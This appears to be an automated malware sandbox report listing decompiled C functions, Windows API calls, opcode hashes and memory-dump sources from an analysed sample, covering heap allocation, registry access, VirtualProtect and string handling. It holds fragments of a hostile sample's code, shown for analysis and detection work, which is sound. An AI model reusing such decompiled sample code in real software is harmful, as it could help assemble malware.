                              • Instruction Fuzzy Hash: 3CE09A31385232D7D7A22AB89C04BEFBB88AB53769F004658FDCAC1085C221C4048396
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E230A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E230A(signed int __edx, void* __edi, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x13ed270 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0x13ed160 = GetTickCount();
				_t5 = E013E2CBF(_a4);
				if(_t5 == 0) {
					E013E2EBD(_t10, __edi, _a4); // executed
					if(E013E3AF1(_t10) != 0) {
						 *0x13ed298 = 1; // executed
					}
					_t8 = E013E587D(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                              0x013e230a
                              0x013e2313
                              0x013e231b
                              0x013e2320
                              0x013e2324
                              0x00000000
                              0x013e2324
                              0x013e2331
                              0x013e2336
                              0x013e233d
                              0x013e2343
                              0x013e234f
                              0x013e2351
                              0x013e2351
                              0x013e235b
                              0x00000000
                              0x013e235b
                              0x013e2360

                              APIs
                              • HeapCreate.KERNELBASE(00000000,00400000,00000000,013E4154,?), ref: 013E2313
                              • GetTickCount.KERNEL32 ref: 013E2327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CountCreateHeapTick
                              • String ID: Txt
                              • API String ID: 2177101570-4033135041
                              • Opcode ID: 72ea0061db9a35976eb7f66ca65754e0c727a60dad2a9e4da389a04491a3dec1
                              • Instruction ID: 5ac29e45611d10fa2e9cb88aa81ad492f01527b0dea0e933c0065aa64c77c570
                              • Opcode Fuzzy Hash: 72ea0061db9a35976eb7f66ca65754e0c727a60dad2a9e4da389a04491a3dec1
                              • Instruction Fuzzy Hash: 70E01271684329EAEB716BB49D0E71B7AEC7B1474CF100415F549D91D4EBB0D4009B15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102EA7F, Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0102EAA5
                              • memcpy.NTDLL ref: 0102EACD
                                • Part of subcall function 010309CA: NtAllocateVirtualMemory.NTDLL(0102C119,00000000,00000000,0102C119,00003000,00000040), ref: 010309FB
                                • Part of subcall function 010309CA: RtlNtStatusToDosError.NTDLL(00000000), ref: 01030A02
                                • Part of subcall function 010309CA: SetLastError.KERNEL32(00000000), ref: 01030A09
                              • GetLastError.KERNEL32(00000010,00000218,01048D4D,00000100,?,00000318,00000008), ref: 0102EAE4
                              • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01048D4D,00000100), ref: 0102EBC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                              • String ID:
                              • API String ID: 685050087-0
                              • Opcode ID: b6bb8cdb160256d9f6d8986279f6b70689545429ea403a187bbd91a293202e3b
                              • Instruction ID: 63e06f3037684c98dfda62041186d24db1b37f1535eaf998e3a9310356337c66
                              • Opcode Fuzzy Hash: b6bb8cdb160256d9f6d8986279f6b70689545429ea403a187bbd91a293202e3b
                              • Instruction Fuzzy Hash: C54190B1644305AFD761DF68CC81BABBBE9FB98310F00892EF5D9C6291E730D5148B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E301A, Relevance: 4.6, APIs: 3, Instructions: 96COMMON
                              Download Yara Rule
                              C-Code - Quality: 18%
                              			E013E301A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t64;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t62 = __esi + 0x2c;
				_v16 = 0;
				 *_t62 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t62);
				_t63 = __imp__; // 0x703bfd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t63() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E013E55DC(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t63() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t64 = E013E55DC(_v8 + 1);
							if(_t64 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t64, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t64;
							}
						}
						E013E6DFA(_v20);
					}
					goto L12;
				}
			}












                              0x013e3020
                              0x013e3029
                              0x013e302c
                              0x013e302f
                              0x013e3031
                              0x013e3034
                              0x013e3115
                              0x013e311b
                              0x013e311b
                              0x013e303e
                              0x013e3045
                              0x013e304d
                              0x013e310c
                              0x013e3112
                              0x00000000
                              0x013e3112
                              0x013e3056
                              0x013e305a
                              0x013e305b
                              0x013e305c
                              0x013e3062
                              0x013e3063
                              0x013e3068
                              0x013e306f
                              0x00000000
                              0x013e3075
                              0x013e3084
                              0x013e3087
                              0x013e308a
                              0x013e3093
                              0x013e309a
                              0x013e309d
                              0x013e3103
                              0x013e309f
                              0x013e30a2
                              0x013e30a6
                              0x013e30a7
                              0x013e30a8
                              0x013e30a9
                              0x013e30ab
                              0x013e30b2
                              0x013e30f6
                              0x013e30b4
                              0x013e30b4
                              0x013e30bd
                              0x013e30cb
                              0x013e30cf
                              0x013e30e7
                              0x013e30d1
                              0x013e30da
                              0x013e30e2
                              0x013e30e2
                              0x013e30cf
                              0x013e30fc
                              0x013e30fc
                              0x00000000
                              0x013e309d

                              APIs
                              • GetLastError.KERNEL32 ref: 013E310C
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • wcstombs.NTDLL ref: 013E30DA
                              • GetLastError.KERNEL32 ref: 013E30F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ErrorLast$AllocateHeapwcstombs
                              • String ID:
                              • API String ID: 2631933831-0
                              • Opcode ID: c2a785eb448df9640decc1aa4d421ded9dba37481a12d62d5bc1bedb4e3c129d
                              • Instruction ID: 5c44072425385c70e7f36371b77ee1e02cfc4c49e1a8929696802097b5dee9d0
                              • Opcode Fuzzy Hash: c2a785eb448df9640decc1aa4d421ded9dba37481a12d62d5bc1bedb4e3c129d
                              • Instruction Fuzzy Hash: 5F310CB5900319EFDB20DF99C885AAEBBFCFB18348F104569E502E3291DB719A449F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D058, Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103A02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,0103D07F,?,00000000,?,?,?,01022E53,80000001), ref: 0103A063
                                • Part of subcall function 0103A02D: lstrcpy.KERNEL32(00000000,00000000), ref: 0103A087
                                • Part of subcall function 0103A02D: lstrcat.KERNEL32(00000000,00000000), ref: 0103A08F
                              • RegOpenKeyExA.KERNELBASE(01022E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D09F
                              • RegOpenKeyExA.ADVAPI32(01022E53,01022E53,00000000,00020019,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0B5
                              • RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0FE
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Open$Closelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 4131162436-0
                              • Opcode ID: 235944140e6a9a08f21c06cc66fd41da5e555dc24ad204f7c97fd7019bed43f9
                              • Instruction ID: 612d495297f91649dff8cbf0e481c7c80bd1293ad1e9b4159abcc07eaad737e6
                              • Opcode Fuzzy Hash: 235944140e6a9a08f21c06cc66fd41da5e555dc24ad204f7c97fd7019bed43f9
                              • Instruction Fuzzy Hash: 9221FCB5900209BFDB11DF98DCC0DEEBBBCEB55244B1040B6F640E2115E771AE559B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E456E, Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 79%
                              			E013E456E(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x13ed270, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E013EAA99(_t57 - _a4, _a4, _t48);
							_t38 = E013EAA99(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E013EAA99(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                              0x013e4576
                              0x013e457b
                              0x013e457d
                              0x013e4584
                              0x013e4596
                              0x013e4596
                              0x013e459a
                              0x013e459c
                              0x013e459f
                              0x013e45a2
                              0x013e45ab
                              0x013e45b5
                              0x013e45b9
                              0x013e45be
                              0x013e45ce
                              0x013e45d4
                              0x013e45d8
                              0x013e4627
                              0x013e45da
                              0x013e45da
                              0x013e45e3
                              0x013e45f2
                              0x013e45f7
                              0x013e4604
                              0x013e460d
                              0x013e4618
                              0x013e461f
                              0x013e4623
                              0x013e4623
                              0x013e45d8
                              0x013e462e
                              0x013e4635

                              APIs
                              • lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 013E45A2
                              • StrStrA.SHLWAPI(00000000,?), ref: 013E45AF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 013E45CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 556738718-0
                              • Opcode ID: 4a04619fea244913a995788b7f9a0b2216ece91d671cc5454573c439fa2b2467
                              • Instruction ID: bdae6885671caff877f5e19f0771ef58e2544957f019bcd83008330e4abf2e3c
                              • Opcode Fuzzy Hash: 4a04619fea244913a995788b7f9a0b2216ece91d671cc5454573c439fa2b2467
                              • Instruction Fuzzy Hash: 22217C3560021AAFDB21CFACD888B9EBFF9EF89215F048155E904AB345C734E915CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E311C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                              Download Yara Rule
                              C-Code - Quality: 47%
                              			E013E311C(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E013E55DC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x13ec2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                              0x013e3120
                              0x013e312d
                              0x013e312f
                              0x013e3130
                              0x013e3138
                              0x013e3138
                              0x013e313c
                              0x00000000
                              0x00000000
                              0x013e3133
                              0x013e3134
                              0x013e3137
                              0x013e3137
                              0x013e3144
                              0x013e314b
                              0x013e314e
                              0x013e3156
                              0x013e315c
                              0x013e315e
                              0x013e3161
                              0x013e3165
                              0x013e3167
                              0x013e316a
                              0x013e316a
                              0x013e316b
                              0x013e316d
                              0x013e316a
                              0x013e3177
                              0x013e317a
                              0x013e317d
                              0x013e3180
                              0x013e3180
                              0x013e3187
                              0x013e3187
                              0x013e3193

                              APIs
                              • StrChrA.SHLWAPI(?,00000020,00000000,03AD95AC,?,?,013E3A64,?,03AD95AC), ref: 013E3138
                              • StrTrimA.KERNELBASE(?,013EC2A4,00000002,?,013E3A64,?,03AD95AC), ref: 013E3156
                              • StrChrA.SHLWAPI(?,00000020,?,013E3A64,?,03AD95AC), ref: 013E3161
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Trim
                              • String ID:
                              • API String ID: 3043112668-0
                              • Opcode ID: 8c99734fbec38ab9e1f3b3da2d55f87340a8b6a6ddaf264addccf1d623f910c1
                              • Instruction ID: d4a0cef539ccadce687c2408b4e7800290a44cd0f16eeb1252160efebae0f440
                              • Opcode Fuzzy Hash: 8c99734fbec38ab9e1f3b3da2d55f87340a8b6a6ddaf264addccf1d623f910c1
                              • Instruction Fuzzy Hash: F9017171304365AEE7206A6E8C4CFA76FEDFB89698F045029FA55CB2C2D674D842C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01023091, Relevance: 4.5, APIs: 3, Instructions: 49memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32 ref: 010230C3
                              • VirtualProtect.KERNELBASE(?,00000004,00000040,80000000), ref: 010230DD
                              • VirtualProtect.KERNELBASE(?,00000004,80000000,80000000,?,00000004,00000040,80000000), ref: 01023110
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$lstrlen
                              • String ID:
                              • API String ID: 386137988-0
                              • Opcode ID: 7e285358d500d8a44063810dde9760ace3a58ac5b6077e7023f5c61644cd6e38
                              • Instruction ID: cb6d0940b58138de9618bfb449af290884ef2b9f5477c1af61e6c7d8ba1c59d1
                              • Opcode Fuzzy Hash: 7e285358d500d8a44063810dde9760ace3a58ac5b6077e7023f5c61644cd6e38
                              • Instruction Fuzzy Hash: CD114F75900218EFEB11CF48C481F9E7FB8FF08350F108085F9859B105C379DA808BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E62E1, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 64%
                              			E013E62E1(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E013E6FB2(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x13ed2b8; // 0x26ea5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x13ee4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x13ee8d0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E013E2522();
					_push( &_v64);
					if( *0x13ed0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E013E2522();
				}
				return _t28;
			}















                              0x013e62e1
                              0x013e62e8
                              0x013e62f1
                              0x013e62f6
                              0x013e62fa
                              0x013e6304
                              0x013e6309
                              0x013e630e
                              0x013e6316
                              0x013e631d
                              0x013e6327
                              0x013e6327
                              0x013e631f
                              0x013e631f
                              0x013e631f
                              0x013e631f
                              0x013e632d
                              0x013e6333
                              0x013e6334
                              0x013e6337
                              0x013e633a
                              0x013e633d
                              0x013e6345
                              0x013e634e
                              0x013e6356
                              0x013e6356
                              0x013e6358
                              0x013e635a
                              0x013e635a
                              0x013e6364

                              APIs
                                • Part of subcall function 013E6FB2: SysAllocString.OLEAUT32(00000000), ref: 013E700E
                                • Part of subcall function 013E6FB2: SysAllocString.OLEAUT32(0070006F), ref: 013E7022
                                • Part of subcall function 013E6FB2: SysAllocString.OLEAUT32(00000000), ref: 013E7034
                                • Part of subcall function 013E6FB2: SysFreeString.OLEAUT32(00000000), ref: 013E7098
                              • memset.NTDLL ref: 013E6304
                              • GetLastError.KERNEL32 ref: 013E6350
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Alloc$ErrorFreeLastmemset
                              • String ID: <
                              • API String ID: 1330562889-4251816714
                              • Opcode ID: b792a5ee89473294297559ef9c5dd3647de8e50d02d0db7c8a002740fe1474bd
                              • Instruction ID: dccb8c1f2fbcda4341dccad1efe7a1f673ebf6432e84553f0473bb99a7ddd5bb
                              • Opcode Fuzzy Hash: b792a5ee89473294297559ef9c5dd3647de8e50d02d0db7c8a002740fe1474bd
                              • Instruction Fuzzy Hash: 990144B1900328EBDB21EFA8D849EDEBBFCAB18754F444426F905EB1D1D770D9048B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010364DE, Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                              • RegOpenKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364FD
                              • lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: cb264d8977172456c62f1b40557c5a4ff2f4e633249caa584bddd9e918578582
                              • Instruction ID: a18dac9c2b5a012a9a3a58848f041e7ee0c429719835efea63dea40f5888da14
                              • Opcode Fuzzy Hash: cb264d8977172456c62f1b40557c5a4ff2f4e633249caa584bddd9e918578582
                              • Instruction Fuzzy Hash: ADF068BA100114FFE7115F94DC94F9B7BACEB85790F10415AF98185144D671D640C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01042501, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(00000760,0103161F), ref: 0104250B
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 010422D3
                                • Part of subcall function 010422AA: RtlDeleteCriticalSection.NTDLL(01050440), ref: 01042306
                                • Part of subcall function 010422AA: RtlDeleteCriticalSection.NTDLL(01050460), ref: 0104230D
                                • Part of subcall function 010422AA: ReleaseMutex.KERNEL32(00000768,00000000,?,?,?,01042516), ref: 01042335
                                • Part of subcall function 010422AA: CloseHandle.KERNEL32(?,?,01042516), ref: 01042341
                                • Part of subcall function 010422AA: ResetEvent.KERNEL32(00000000,00000000,?,?,?,01042516), ref: 0104234D
                                • Part of subcall function 010422AA: CloseHandle.KERNEL32(?,?,01042516), ref: 01042359
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 0104235F
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 01042373
                                • Part of subcall function 010422AA: HeapFree.KERNEL32(00000000,00000000,?,?,01042516), ref: 01042396
                                • Part of subcall function 010422AA: RtlRemoveVectoredExceptionHandler.NTDLL(00F9D858), ref: 010423D0
                                • Part of subcall function 010422AA: SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 010423DF
                              • CloseHandle.KERNEL32(00000760), ref: 01042520
                              • HeapDestroy.KERNELBASE(04740000), ref: 01042530
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                              • String ID:
                              • API String ID: 2773679374-0
                              • Opcode ID: 6db49e5b0b54f245b09f1917521e13d0ee29238c48b4a6de05c5c7d9a0e9af92
                              • Instruction ID: 8ef339c6603be93cf56754ea004a7f529bb61b6cfde0096c6391974bcfc9d793
                              • Opcode Fuzzy Hash: 6db49e5b0b54f245b09f1917521e13d0ee29238c48b4a6de05c5c7d9a0e9af92
                              • Instruction Fuzzy Hash: F3E04CF4B503059BAB709F75FAD8A5F3BECAB1478130414A4B986D314CDA3ED604CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E60DD, Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E60DD(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E013E55DC(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x13ed308, 0x110);
					_t27 =  *0x13ed30c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E013E6E0F(0x110, _a4, _t27, 0);
					}
					if(E013E8DD3( &_v36) != 0 && E013E6E7F(0x110, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E013E2363(_t55, _a8, _t51, _t46, _a12); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						memset(_t55, 0, _v12 - (_t46[4] & 0xf));
						_t57 = _t57 + 0xc;
						E013E6DFA(_t55);
					}
					memset(_a4, 0, _t53);
					E013E6DFA(_a4);
				}
				return _v16;
			}















                              0x013e60e3
                              0x013e60e8
                              0x013e60f5
                              0x013e60f8
                              0x013e60fb
                              0x013e6102
                              0x013e6105
                              0x013e6113
                              0x013e6118
                              0x013e611d
                              0x013e6122
                              0x013e6124
                              0x013e612c
                              0x013e612c
                              0x013e613b
                              0x013e615e
                              0x013e6164
                              0x013e616a
                              0x013e6172
                              0x013e6178
                              0x013e6188
                              0x013e618d
                              0x013e6191
                              0x013e6191
                              0x013e619c
                              0x013e61a7
                              0x013e61a7
                              0x013e61b3

                              APIs
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 013E6113
                              • memset.NTDLL ref: 013E6188
                              • memset.NTDLL ref: 013E619C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 1529149438-0
                              • Opcode ID: 59b24d23793cc3436a4c0cf266b1982b2c7a082b6ce5d41bd1239f065200f7ce
                              • Instruction ID: 5ef3b1ac8d6a8e4546a9b99dbb83b16de9e97fdf7eb40b1a3be9549421da4a5f
                              • Opcode Fuzzy Hash: 59b24d23793cc3436a4c0cf266b1982b2c7a082b6ce5d41bd1239f065200f7ce
                              • Instruction Fuzzy Hash: 7B212FB5A00329ABDB11AF59CC45BDFBBF8AF68644F044025F905E6281E734D650CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E447C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E013E447C(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E013E78A8(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x13ed2b8; // 0x26ea5a8
						_t9 = _t17 + 0x13eea1c; // 0x444f4340
						_t20 = E013E456E( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x13ed270, 0, _a4); // executed
					}
				}
				return _t26;
			}








                              0x013e447f
                              0x013e4485
                              0x013e44dc
                              0x013e448b
                              0x013e4496
                              0x013e449b
                              0x013e449f
                              0x013e44ac
                              0x013e44b4
                              0x013e44c0
                              0x013e44c8
                              0x013e44d2
                              0x013e44d2
                              0x013e449f
                              0x013e44e1

                              APIs
                                • Part of subcall function 013E78A8: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 013E78C0
                                • Part of subcall function 013E456E: lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 013E45A2
                                • Part of subcall function 013E456E: StrStrA.SHLWAPI(00000000,?), ref: 013E45AF
                                • Part of subcall function 013E456E: RtlAllocateHeap.NTDLL(00000000,?), ref: 013E45CE
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,013E2EB0), ref: 013E44D2
                              Strings
